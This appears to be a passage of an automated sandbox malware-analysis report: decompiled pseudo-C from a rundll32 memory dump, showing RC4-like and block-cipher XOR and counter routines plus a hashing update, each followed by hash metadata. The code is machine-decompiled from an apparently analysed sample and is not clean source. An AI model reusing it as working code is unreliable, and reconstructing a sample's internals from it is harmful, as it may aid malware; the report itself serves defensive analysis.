                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[2] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[3] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[4] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[5] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[6] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t404 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *_t476;
                                        				 *_t472 = _t404;
                                        				if (__rdx - 0xfffffffffffffffa != 0) goto 0xf30430c2;
                                        				 *__rcx = r11d;
                                        				 *(__rcx + 4) = r10d;
                                        				return _t404;
                                        			}










                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e457136d7b82e30fdc63789bf8eb56974cea7a9059dafed3d447c4b0dc03fc3e
                                        • Instruction ID: 1a05ca5e9caa1eda1bb9016b0eb11c09d83b83985f41ae4c2676d1a82bd85c3d
                                        • Opcode Fuzzy Hash: e457136d7b82e30fdc63789bf8eb56974cea7a9059dafed3d447c4b0dc03fc3e
                                        • Instruction Fuzzy Hash: D2D19E731286A48EC715CF55C088CAD7BBAF315745786C2AADFC5C3682C325EAADDB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0b0d06c46f2ef17ac458ab5cfccd720c50535bdd8bf3ea15260215372d5ae42
                                        • Instruction ID: 1be978c27f88a45db11971389e5dd19ab8dffb3e8fd879455a51bd147f967624
                                        • Opcode Fuzzy Hash: f0b0d06c46f2ef17ac458ab5cfccd720c50535bdd8bf3ea15260215372d5ae42
                                        • Instruction Fuzzy Hash: A1B11B2331A2C58FD30DCE7D49405AD6F61E376A04748859EDF81EB78BC518DA2AC7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f10bb955cce9e4bb5625015ee70f205ada93e5c97b3a5163307eea800fc0584
                                        • Instruction ID: 27e5c4e7a1f9173764e2670f9457efbee337dae98e8d8eaea7c60357bd18f29d
                                        • Opcode Fuzzy Hash: 5f10bb955cce9e4bb5625015ee70f205ada93e5c97b3a5163307eea800fc0584
                                        • Instruction Fuzzy Hash: 2D71A4A3B166D84BCB54CB1EBC4165AFAD5F398BC8B18D125EE8C87B65E53CD602C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E0000021E21EF3043670() {
                                        				signed int _t12;
                                        				void* _t25;
                                        				void* _t27;
                                        				void* _t28;
                                        
                                        				r10d = r10d ^ _t12;
                                        				 *(_t25 + 8) = r10d;
                                        				r10d = _t28 - 1;
                                        				 *(_t27 + 8) =  *(_t27 + 8) ^ _t12;
                                        				asm("dec ax");
                                        				asm("punpcklqdq xmm3, xmm3");
                                        				if (r10d - 9 > 0) goto 0xf30436c5;
                                        				goto __rcx;
                                        			}








                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fddbc7fe2d619c317f765c4772342b077af5910fd1e9f6a36f4bab8183655e82
                                        • Instruction ID: ae5cd0389258d96c21fc09f59259e109bc780b673ce9fc61912a3872b64d7ae5
                                        • Opcode Fuzzy Hash: fddbc7fe2d619c317f765c4772342b077af5910fd1e9f6a36f4bab8183655e82
                                        • Instruction Fuzzy Hash: 5F9124B3215E8482EA14CB29C8995AE7765FB9CBC4B02E667DE5E93724EB38C554C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0000021E21EF305FB60(signed long long __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rsi, long long __r8, long long __r12, long long __r13, long long __r15) {
                                        				void* __rdi;
                                        				void* __r14;
                                        				signed char _t113;
                                        				unsigned int _t124;
                                        				void* _t125;
                                        				void* _t126;
                                        				void* _t131;
                                        				unsigned int _t140;
                                        				void* _t141;
                                        				void* _t145;
                                        				void* _t151;
                                        				signed long long _t153;
                                        				intOrPtr _t178;
                                        				signed long long _t179;
                                        				signed long long _t197;
                                        				void* _t210;
                                        				void* _t218;
                                        				void* _t220;
                                        				void* _t221;
                                        				void* _t222;
                                        				intOrPtr _t226;
                                        				unsigned long long _t227;
                                        				signed long long _t228;
                                        				long long _t232;
                                        				void* _t233;
                                        				long long _t234;
                                        				void* _t241;
                                        				void* _t242;
                                        				void* _t243;
                                        				void* _t244;
                                        				unsigned long long _t261;
                                        				void* _t262;
                                        				void* _t264;
                                        				long long _t271;
                                        				void* _t272;
                                        				void* _t275;
                                        
                                        				_t153 = __rax;
                                        				 *((long long*)(_t241 + 8)) = __rbx;
                                        				 *((long long*)(_t241 + 0x10)) = _t232;
                                        				 *((long long*)(_t241 + 0x18)) = __rsi;
                                        				E0000021E21EF310C220();
                                        				_t242 = _t241 - __rax;
                                        				r8d = 0x188;
                                        				_t233 = __rcx;
                                        				E0000021E21EF310E410(_t126, 0, _t131, _t141, __rcx, __rdx, __r8, __r8);
                                        				 *((long long*)(_t233 + 0x178)) = __r8;
                                        				 *((long long*)(_t233 + 0x180)) = __rdx;
                                        				 *((long long*)(__r8))();
                                        				_t210 = _t233 + 0x50;
                                        				r8d =  *(_t233 + 0x58) & 0x000000ff;
                                        				_t261 = ((((((__rdx << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153;
                                        				 *(_t233 + 0x58) = _t261;
                                        				 *(_t233 + 0x50) = ((((((_t233 + 0x00000050 << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153;
                                        				_t197 = _t233 + 0x60;
                                        				_t178 =  *((intOrPtr*)(_t242 + 0x30));
                                        				_t234 =  *((intOrPtr*)(_t242 + 0x38));
                                        				_t226 =  *((intOrPtr*)(_t242 + 0x40));
                                        				_t243 = _t242 + 0x20;
                                        				_t220 = _t218;
                                        				goto 0xf30602a0;
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				E0000021E21EF310C220();
                                        				_t244 = _t243 - _t153;
                                        				r14d = 0;
                                        				_t227 = _t261;
                                        				 *_t197 = _t271;
                                        				_t221 = _t210;
                                        				 *((long long*)(_t197 + 8)) = _t271;
                                        				_t179 = _t197;
                                        				 *((long long*)(_t197 + 0x40)) = _t271;
                                        				 *((long long*)(_t197 + 0x48)) = _t271;
                                        				 *((long long*)(_t197 + 0x30)) = _t271;
                                        				 *((long long*)(_t197 + 0x38)) = _t271;
                                        				 *((long long*)(_t197 + 0x170)) = _t271;
                                        				if (_t261 != 0xc) goto 0xf305fcde;
                                        				asm("movsd xmm0, [edx]");
                                        				asm("movsd [ecx], xmm0");
                                        				 *((intOrPtr*)(_t197 + 8)) =  *((intOrPtr*)(_t210 + 8));
                                        				 *((char*)(_t197 + 0xf)) = 1;
                                        				goto 0xf305feba;
                                        				 *((long long*)(_t244 + 0x58)) = _t234;
                                        				 *(_t244 + 0x50) = _t227;
                                        				if (_t227 - 0x10 < 0) goto 0xf305fd9a;
                                        				 *((long long*)(_t244 + 0x60)) = __r12;
                                        				 *((long long*)(_t244 + 0x68)) = __r13;
                                        				 *((long long*)(_t244 + 0x20)) = __r15;
                                        				_t228 = _t227 + (_t227 >> 4) * 0xfffffff0;
                                        				_t275 = _t197 + 0xf;
                                        				_t262 =  ~_t179 + _t221;
                                        				if (_t179 - _t262 + _t275 > 0) goto 0xf305fd60;
                                        				_t145 = _t275 - _t221;
                                        				if (_t145 < 0) goto 0xf305fd60;
                                        				_t156 = _t179;
                                        				asm("o16 nop [eax+eax]");
                                        				 *_t156 =  *_t179 ^  *(_t262 + _t179) & 0x000000ff;
                                        				if (_t145 != 0) goto 0xf305fd40;
                                        				goto 0xf305fd70;
                                        				asm("o16 nop [eax+eax]");
                                        				asm("movdqu xmm1, [ebx]");
                                        				asm("movdqu xmm0, [edi]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [ebx], xmm1");
                                        				E0000021E21EF3060130(_t125, _t145,  &(_t156[0]), _t179, _t179, _t179 + 0x60, _t221, _t228, _t264, _t271, _t271, _t220);
                                        				_t222 = _t221 + 0x10;
                                        				if (_t145 != 0) goto 0xf305fd20;
                                        				if (_t228 == 0) goto 0xf305fe3c;
                                        				if (_t228 - 0x20 < 0) goto 0xf305fe04;
                                        				if (_t179 - _t222 - 1 + _t228 > 0) goto 0xf305fdc1;
                                        				if (_t179 - 1 + _t228 - _t222 >= 0) goto 0xf305fe04;
                                        				asm("movdqu xmm0, [eax]");
                                        				_t272 = _t271 + 0x20;
                                        				asm("movdqu xmm1, [eax+ecx]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax-0x20], xmm1");
                                        				asm("movdqu xmm1, [ecx+eax-0x10]");
                                        				asm("movdqu xmm0, [eax-0x10]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax-0x10], xmm1");
                                        				if (_t272 - (_t228 & 0xffffffe0) < 0) goto 0xf305fdd1;
                                        				_t151 = _t272 - _t228;
                                        				if (_t151 >= 0) goto 0xf305fe30;
                                        				_t223 = _t222 - _t179;
                                        				_t203 = _t272 + _t179;
                                        				asm("o16 nop [eax+eax]");
                                        				 *_t203 =  *(_t272 + _t179) ^  *(_t222 - _t179 + _t272 + _t179) & 0x000000ff;
                                        				if (_t151 != 0) goto 0xf305fe20;
                                        				_t113 = E0000021E21EF3060130(_t125, _t151, _t179 + 0x20, _t179, _t179, _t179 + 0x60, _t222 - _t179, _t228 - _t272 - 1, _t264, _t272, _t226, _t178);
                                        				 *(_t179 + 0xf) =  *(_t179 + 0xf) ^ bpl;
                                        				 *(_t179 + 8) =  *(_t179 + 8) ^ _t113;
                                        				 *(_t179 + 9) =  *(_t179 + 9) ^ _t113;
                                        				 *(_t179 + 0xa) =  *(_t179 + 0xa) ^ _t113;
                                        				 *(_t179 + 0xb) =  *(_t179 + 0xb) ^ _t113;
                                        				 *(_t179 + 0xc) =  *(_t179 + 0xc) ^ _t113;
                                        				 *(_t179 + 0xd) =  *(_t179 + 0xd) ^ _t113;
                                        				 *(_t179 + 0xe) =  *(_t179 + 0xe) ^ _t113;
                                        				E0000021E21EF3060130(_t125, _t151,  *(_t244 + 0x50) << 3 >> 8, _t179, _t179, _t179 + 0x60, _t223, _t228 - _t272 - 1, _t264, _t272);
                                        				 *((intOrPtr*)(_t179 + 0x178))();
                                        				_t140 = (((( *(_t179 + 0xc) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xd) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xe) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xf) & 0x000000ff) + 1;
                                        				 *(_t179 + 0xf) = dil;
                                        				 *(_t179 + 0xc) = _t140 >> 0x18;
                                        				 *(_t179 + 0xd) = _t140 >> 0x10;
                                        				_t124 = _t140 >> 8;
                                        				 *(_t179 + 0xe) = _t124;
                                        				return _t124;
                                        			}








































                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ecd3b4498f9f1334892d6fcf3a8a6aa42bfa1d9bdc2855b014501723ff72136
                                        • Instruction ID: f901c6ee80450afbccb9e0c8886e9f7788e72aa3eb497fb73e8acde69025c54b
                                        • Opcode Fuzzy Hash: 2ecd3b4498f9f1334892d6fcf3a8a6aa42bfa1d9bdc2855b014501723ff72136
                                        • Instruction Fuzzy Hash: 49817A72604BC48AD750CFA9B8566AA7BE5F359784F05A126EF9C53B06EB38C1A4C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 62%
                                        			E0000021E21EF305F3E0(void* __rax, void* __rcx, signed int* __rdx, long long __rdi, signed char* __r8, void* __r9, long long __r12, long long __r13, long long __r15) {
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* __r14;
                                        				signed char _t98;
                                        				signed int _t99;
                                        				void* _t126;
                                        				signed char _t131;
                                        				unsigned int _t139;
                                        				unsigned int _t140;
                                        				unsigned int _t141;
                                        				void* _t146;
                                        				void* _t148;
                                        				void* _t149;
                                        				intOrPtr _t150;
                                        				long long _t173;
                                        				void* _t174;
                                        				signed long long _t177;
                                        				unsigned long long _t185;
                                        				signed char* _t193;
                                        				signed long long* _t194;
                                        				signed long long* _t195;
                                        				signed long long* _t196;
                                        				signed int* _t198;
                                        				signed int* _t199;
                                        				signed int* _t200;
                                        				void* _t201;
                                        				void* _t202;
                                        				void* _t213;
                                        				void* _t222;
                                        				signed long long _t223;
                                        				unsigned long long _t226;
                                        
                                        				_t211 = __r9;
                                        				_t191 = __rdi;
                                        				E0000021E21EF310C220();
                                        				_t202 = _t201 - __rax;
                                        				 *((long long*)(_t202 + 0x28)) =  *((intOrPtr*)(__rcx + 0x178));
                                        				_t222 = __r9;
                                        				_t193 = __r8;
                                        				 *((long long*)(_t202 + 0x20)) =  *((intOrPtr*)(__rcx + 0x180));
                                        				_t173 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
                                        				if (_t173 - 0xffffffe0 > 0) goto 0xf305f71e;
                                        				if (_t173 - __r9 < 0) goto 0xf305f71e;
                                        				 *((long long*)(_t202 + 0x88)) = __rdi;
                                        				 *((long long*)(_t202 + 0x40)) = __r15;
                                        				 *((long long*)(__rcx + 0x38)) = _t173;
                                        				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f46b;
                                        				_t174 = __rcx + 0x40;
                                        				E0000021E21EF3060130(_t126,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t174, __rcx + 0x60, __rdi, __r8, _t213, __r9);
                                        				 *((intOrPtr*)(__rcx + 0x174)) = 0;
                                        				r15d =  *(__rcx + 0x170);
                                        				 *(_t202 + 0x80) = r15d;
                                        				if (r15d == 0) goto 0xf305f4e8;
                                        				_t146 = _t222;
                                        				if (_t146 == 0) goto 0xf305f4d2;
                                        				_t223 = _t222 - 1;
                                        				_t98 =  *(_t174 + __rcx + 0x10) & 0x000000ff ^  *__rdx;
                                        				_t198 =  &(__rdx[0]);
                                        				 *_t193 = _t98;
                                        				_t194 =  &(_t193[1]);
                                        				 *(_t174 + __rcx + 0x40) =  *(_t174 + __rcx + 0x40) ^ _t98;
                                        				r15d = r15d + 1;
                                        				r15d = r15d & 0x0000000f;
                                        				 *(_t202 + 0x80) = r15d;
                                        				if (_t146 != 0) goto 0xf305f4a0;
                                        				goto 0xf305f4db;
                                        				if (r15d != 0) goto 0xf305f713;
                                        				_t185 = __rcx + 0x60;
                                        				_t99 = E0000021E21EF3060130(_t126, r15d, 0xffffffe0, __rcx, __rcx + 0x40, _t185, _t191, _t194, _t213, _t223);
                                        				 *((long long*)(_t202 + 0x50)) = __r12;
                                        				 *((long long*)(_t202 + 0x48)) = __r13;
                                        				_t148 = _t223 - 0xc00;
                                        				if (_t148 < 0) goto 0xf305f5d6;
                                        				_t177 = _t185 >> 0xb;
                                        				 *(_t202 + 0x30) = _t177;
                                        				 *((long long*)(_t202 + 0x98)) = _t223 + _t177 * 0xfffff400;
                                        				r12d = 0xc0;
                                        				asm("o16 nop [eax+eax]");
                                        				 *((long long*)( *((intOrPtr*)(_t202 + 0x28))))();
                                        				_t139 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 1;
                                        				 *(__rcx + 0xf) = dil;
                                        				 *(__rcx + 0xc) = _t139 >> 0x18;
                                        				 *(__rcx + 0xd) = _t139 >> 0x10;
                                        				 *(__rcx + 0xe) = _t139 >> 8;
                                        				 *_t194 =  *(__rcx + 0x10) ^  *_t198;
                                        				_t199 =  &(_t198[4]);
                                        				_t194[1] = _t198[2] ^  *(__rcx + 0x18);
                                        				_t195 =  &(_t194[2]);
                                        				if (_t148 != 0) goto 0xf305f550;
                                        				r9d = 0xc00;
                                        				E0000021E21EF305FF60(_t126, _t99 * _t223 >> 0x20, _t148, _t198[2] ^  *(__rcx + 0x18), __rcx, __rcx + 0x40, __rcx + 0x60, _t191, _t195, _t199, _t195 - 0xc00, _t211);
                                        				 *(_t202 + 0x30) =  *(_t202 + 0x30) - 1;
                                        				if (_t148 != 0) goto 0xf305f540;
                                        				_t226 =  *((intOrPtr*)(_t202 + 0x98));
                                        				r15d =  *(_t202 + 0x80);
                                        				 *(_t202 + 0x30) = _t226 & 0xfffffff0;
                                        				if (_t148 == 0) goto 0xf305f68d;
                                        				_t149 = _t226 - 0x10;
                                        				if (_t149 < 0) goto 0xf305f677;
                                        				 *((long long*)(_t202 + 0x98)) = _t226 + (_t226 >> 4) * 0xfffffff0;
                                        				 *((long long*)( *((intOrPtr*)(_t202 + 0x28))))();
                                        				_t140 = _t139 + 1;
                                        				 *(__rcx + 0xf) = dil;
                                        				 *(__rcx + 0xc) = _t140 >> 0x18;
                                        				 *(__rcx + 0xd) = _t140 >> 0x10;
                                        				 *(__rcx + 0xe) = _t140 >> 8;
                                        				 *_t195 =  *(__rcx + 0x10) ^  *_t199;
                                        				_t200 =  &(_t199[4]);
                                        				_t195[1] = _t199[2] ^  *(__rcx + 0x18);
                                        				_t196 =  &(_t195[2]);
                                        				if (_t149 != 0) goto 0xf305f612;
                                        				r15d =  *(_t202 + 0x80);
                                        				E0000021E21EF305FF60(_t126, _t99 * _t223 >> 0x20, _t149,  *(_t202 + 0x30), __rcx, __rcx + 0x40, __rcx + 0x60, _t191, _t196, _t200, _t196 -  *(_t202 + 0x30),  *(_t202 + 0x30));
                                        				_t150 =  *((intOrPtr*)(_t202 + 0x98));
                                        				if (_t150 == 0) goto 0xf305f6ee;
                                        				 *((intOrPtr*)(_t202 + 0x28))();
                                        				_t141 = _t140 + 1;
                                        				 *(__rcx + 0xf) = dil;
                                        				 *(__rcx + 0xc) = _t141 >> 0x18;
                                        				 *(__rcx + 0xd) = _t141 >> 0x10;
                                        				 *(__rcx + 0xe) = _t141 >> 8;
                                        				asm("o16 nop [eax+eax]");
                                        				r15d = r15d + 1;
                                        				_t131 =  *(__rcx + _t200) & 0x000000ff ^  *(__rcx + __rcx + 0x10) & 0x000000ff;
                                        				 *(__rcx + _t196) = _t131;
                                        				 *(__rcx + __rcx + 0x40) =  *(__rcx + __rcx + 0x40) ^ _t131;
                                        				if (_t150 != 0) goto 0xf305f6d0;
                                        				 *(__rcx + 0x170) = r15d;
                                        				return 0;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9682f4c572a294b176498c2a7ac4af723b75de05574b72cb71e1bd23acf90c10
                                        • Instruction ID: 5479ba9f1a219e09c6bd146ef2f7ae344f6f487cbf340abcdf905dabdd4c6e48
                                        • Opcode Fuzzy Hash: 9682f4c572a294b176498c2a7ac4af723b75de05574b72cb71e1bd23acf90c10
                                        • Instruction Fuzzy Hash: C491C173215BC4C6DB508F39A84039A7BA0F795B98F498216DE8D8BB9ADE3CC546C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E0000021E21EF3070860(void* __esi, void* __rax, long long __rbx, void* __rcx, signed char* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, void* _a40, void* _a48, void* _a56) {
                                        				void* __rdi;
                                        				void* _t65;
                                        				unsigned int _t66;
                                        				signed int _t67;
                                        				signed int _t68;
                                        				void* _t90;
                                        				void* _t97;
                                        				void* _t98;
                                        				long long* _t118;
                                        				void* _t119;
                                        				signed int* _t137;
                                        				void* _t141;
                                        				unsigned long long _t145;
                                        				unsigned long long _t146;
                                        				void* _t161;
                                        				signed int* _t163;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				E0000021E21EF310C220();
                                        				_t66 =  *(__rcx + 0x80);
                                        				r12d = r8d;
                                        				 *((intOrPtr*)(__rcx + 0x88)) =  *((intOrPtr*)(__rcx + 0x88)) + __r8;
                                        				r12d =  ~r12d;
                                        				r14d = _t66;
                                        				r12d = r12d & 0x00000007;
                                        				r14d = r14d & 0x00000007;
                                        				_t141 = __rcx;
                                        				_t98 =  *((intOrPtr*)(__rcx + 0x88)) - __r8;
                                        				if (_t98 >= 0) goto 0xf30708d3;
                                        				_t118 = __rcx + 0x90;
                                        				 *_t118 =  *_t118 + 1;
                                        				if (_t98 != 0) goto 0xf30708d3;
                                        				_t119 = _t118 + 8;
                                        				if (__rcx + 1 - 4 < 0) goto 0xf30708c0;
                                        				if (r12d != 0) goto 0xf30708e1;
                                        				if (r14d == 0) goto 0xf3070a49;
                                        				r13d = 8;
                                        				r13d = r13d - r12d;
                                        				asm("o16 nop [eax+eax]");
                                        				if (__r8 == 0) goto 0xf3070af6;
                                        				r8d = _t66;
                                        				r8d = r8d >> 3;
                                        				if (r14d == r12d) goto 0xf3070a01;
                                        				if (__r8 - 8 < 0) goto 0xf3070996;
                                        				bpl = bpl >> (r13b & 0xffffffff);
                                        				bpl = bpl | ( *__rdx & 0x000000ff) << r12d;
                                        				if (r14d == 0) goto 0xf3070941;
                                        				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | (bpl & 0xffffffff) >> (r14b & 0xffffffff);
                                        				goto 0xf3070946;
                                        				 *(__r8 + __rcx + 0x40) = bpl;
                                        				_t67 = _t66 + 8;
                                        				_t163 =  &(__rdx[1]);
                                        				r8d = r8d + 1;
                                        				if (_t67 - 0x200 < 0) goto 0xf3070976;
                                        				r8d = 1;
                                        				E0000021E21EF3098950(_t67, r14b & 0xffffffff, _t90, _t119, __rcx, __rcx + 0x40, __r8);
                                        				r8d = 0;
                                        				_t68 = _t67 & 0x000001ff;
                                        				if (r14d == 0) goto 0xf30709f6;
                                        				bpl = bpl << 8 - r14d;
                                        				 *(__r8 + __rcx + 0x40) = bpl;
                                        				 *(__rcx + 0x80) = _t68;
                                        				goto 0xf30708f0;
                                        				bpl = bpl << r12d;
                                        				if (r14d == 0) goto 0xf30709b6;
                                        				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | (bpl & 0xffffffff) >> (r14b & 0xffffffff);
                                        				goto 0xf30709bb;
                                        				 *(__r8 + __rcx + 0x40) = bpl;
                                        				r8d = r8d + 1;
                                        				if (_t68 + __esi != 0x200) goto 0xf30709df;
                                        				r8d = 1;
                                        				E0000021E21EF3098950(_t68 + __esi, r14b & 0xffffffff, _t90, _t119, __rcx, __rcx + 0x40, __r8);
                                        				r8d = 0;
                                        				if (r14d == 0) goto 0xf30709f4;
                                        				bpl = bpl << 8 - r14d;
                                        				 *(__r8 + __rcx + 0x40) = bpl;
                                        				 *(__rcx + 0x80) = 0;
                                        				goto 0xf30708f0;
                                        				r14d = 0;
                                        				r12d = 0;
                                        				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | 0x000000ff >> r12d &  *_t163;
                                        				_t145 = __r8 - 8 - _t119;
                                        				if (0 + r13d != 0x200) goto 0xf3070a3e;
                                        				_t34 = _t161 + 1; // 0x1
                                        				r8d = _t34;
                                        				E0000021E21EF3098950(0 + r13d, r12d, _t90, _t119, __rcx, __rcx + 0x40, __r8);
                                        				 *(__rcx + 0x80) = 0;
                                        				goto 0xf30708d3;
                                        				if (_t145 == 0) goto 0xf3070af6;
                                        				if (0 != 0) goto 0xf3070a83;
                                        				_t150 = _t145 >> 9;
                                        				if (_t145 >> 9 == 0) goto 0xf3070a83;
                                        				_t137 =  &(_t163[0]);
                                        				E0000021E21EF3098950(0, r12d, _t90, _t119, __rcx, _t137, _t145 >> 9);
                                        				goto 0xf3070aed;
                                        				if (_t145 - _t137 < 0) goto 0xf3070acb;
                                        				_t146 = _t145 - _t137;
                                        				r8d = 0x200 >> 3;
                                        				E0000021E21EF310DC90(0 >> 3, _t90, 0, _t97, __rcx + 0x40 + _t119,  &(_t163[0]) + (_t145 >> 9 << 9 >> 3), __rcx, _t146, _t150);
                                        				r8d = 1;
                                        				E0000021E21EF3098950(0x200 >> 3, 0 >> 3, _t90, _t119, _t141, _t141 + 0x40, _t150);
                                        				goto 0xf3070ae7;
                                        				_t65 = E0000021E21EF310DC90(0 >> 3, _t90, 0, _t97, _t141 + 0x40 + _t119,  &(_t163[0]) + (_t145 >> 9 << 9 >> 3) + __rbx, _t141, _t146, _t146 >> 3);
                                        				 *((intOrPtr*)(_t141 + 0x80)) = 0;
                                        				if (_t146 != 0) goto 0xf3070a52;
                                        				return _t65;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
